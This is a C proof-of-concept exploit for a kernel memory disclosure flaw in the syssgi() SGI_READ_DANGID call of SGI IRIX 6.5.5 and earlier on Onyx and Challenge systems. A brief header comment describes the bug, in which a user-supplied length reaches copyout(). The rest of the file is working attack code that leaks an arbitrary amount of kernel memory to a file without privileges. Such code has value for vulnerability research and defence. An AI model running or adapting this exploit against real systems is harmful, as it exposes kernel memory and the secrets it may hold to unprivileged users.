irix-onyx-syssgi.c

/* SGI IRIX <= 6.5.5 syssgi() Onyx kernel memory disclosure
 * ========================================================
 * The SGI BSD system call interface "syssgi" contains a memory
 * information leak vulnerability in SGI_READ_DANGID. The flaw
 * is only present on IP19/IP21/IP25 systems which were used in
 * the SGI Onyx, Challenge and Power Challenge line of systems.
 * The vulnerability allows a user to supply buffer and arbitrary
 * length to a copyout() operation. This allows for disclosure
 * of kernel memory back to user space applications without 
 * privileges or capabilities.
 * 
 * - Hacker Fantastic (https://hacker.house)
 */
#include <stdio.h>
#include <stdlib.h>
#include <sys/syssgi.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

int main(int argc,char* argv[]){
        int fd;
        ssize_t out, bufsize;
        char* output_buffer;
        if(argc < 3){
                printf("[ Use with <filepath> <size>\n");
                exit(1);
        }
        printf("[ IRIX 6.5.5 syssgi() Onyx IP19/IP21/IP25 kernel memory information leak\n");
	bufsize = atoi(argv[2]);
        output_buffer = malloc(bufsize);
        if(!output_buffer){
                exit(0);
        }
        memset(output_buffer,0,bufsize);
        out = syssgi(SGI_READ_DANGID,output_buffer,bufsize);
        fd = open(argv[1],O_RDWR|O_CREAT,0700);
        if(fd!=-1){
                out = write(fd,output_buffer,bufsize);
                printf("[ Wrote %u bytes to %s\n",out,argv[1]);
                close(fd);
        }
        exit(0);
}